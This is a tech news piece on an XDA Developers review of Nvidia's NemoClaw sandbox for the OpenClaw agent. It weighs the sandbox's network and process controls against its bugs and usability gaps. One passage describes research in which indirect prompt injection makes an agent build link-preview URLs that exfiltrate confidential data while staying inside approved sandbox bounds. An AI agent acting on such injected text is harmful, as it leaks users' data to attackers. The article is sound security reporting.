XDA Developers Tests Nvidia's NemoClaw Sandbox and Finds OpenClaw's Core Security Problems Unchanged

XDA Developers’ Lead Technical Editor Adam Conway spent several days running Nvidia’s NemoClaw security sandbox for OpenClaw on a Lenovo ThinkStation PGX, powered by the GB10 Grace Blackwell Superchip. His conclusion: NemoClaw’s containment architecture is well-designed, but it fails to address the structural security problems that make OpenClaw dangerous in the first place.

What NemoClaw Gets Right

Conway credits Nvidia’s OpenShell layer with genuine security improvements. NemoClaw runs a deny-by-default network policy, blocking every outbound request that doesn’t match an explicitly whitelisted endpoint. Filesystem and process isolation uses kernel-level containment to prevent agents from reading host paths or persisting changes across runs. Policy enforcement happens outside the agent process, meaning the agent cannot override its own containment through prompt manipulation. “If you’re going to run OpenClaw, running it inside NemoClaw is much better than running it bare,” Conway wrote.

Where It Falls Apart

The practical experience was a different story. Conway hit a documented permissions bug where OpenClaw’s gateway couldn’t access its own approval configuration because the sandbox directory was owned by root instead of the sandbox user. The workaround is a manual chown inside the container. NemoClaw’s Telegram bridge required an Nvidia API key even when using local Ollama inference, routing messages through Nvidia’s infrastructure in a way Conway noted is poorly documented. After running overnight, the OpenClaw dashboard became completely unreachable while the agent continued functioning on Telegram.

The default sandbox configuration blocks basic requests like weather lookups. The only pre-applied endpoint presets were for pypi and npm. Conway described the assistant as “almost useless out of the box.”

The Structural Problem No Sandbox Can Fix

Conway’s core argument: OpenClaw is useful because it connects to services like email, messaging, calendars, and code repositories. Every one of those approved connections is a potential vector for prompt injection and credential theft, and NemoClaw’s network-level controls cannot inspect the semantic content of what flows through them.

PromptArmor published research on April 2 demonstrating that link previews in messaging apps like Telegram and Discord can be weaponized for data exfiltration through indirect prompt injection. An attacker tricks the agent into generating a URL that transmits confidential data to an external domain. The agent operates within its approved sandbox boundaries the entire time. OWASP ranks prompt injection as the number-one risk for LLM-based systems.

“The model still processes untrusted input alongside trusted instructions, and it still makes judgment calls about what to do with that input,” Conway wrote. “OpenShell can’t inspect the meaning of a request, only the destination.”

Why It Matters for Builders

This review lands alongside an active security week for OpenClaw. Ars Technica reported on CVE-2026-33579, an unauthenticated privilege escalation vulnerability, and Anthropic’s subscription cutoff for third-party OpenClaw access goes live today at 3 PM ET. For the 350,000-star project’s user base evaluating whether OpenClaw is production-ready for sensitive environments, the XDA review offers a specific, tested verdict: NemoClaw reduces the blast radius when things go wrong, but it does not make OpenClaw safe for processing untrusted input from connected services. The security problem is architectural, not operational, and no amount of external containment changes the trust model at the semantic layer.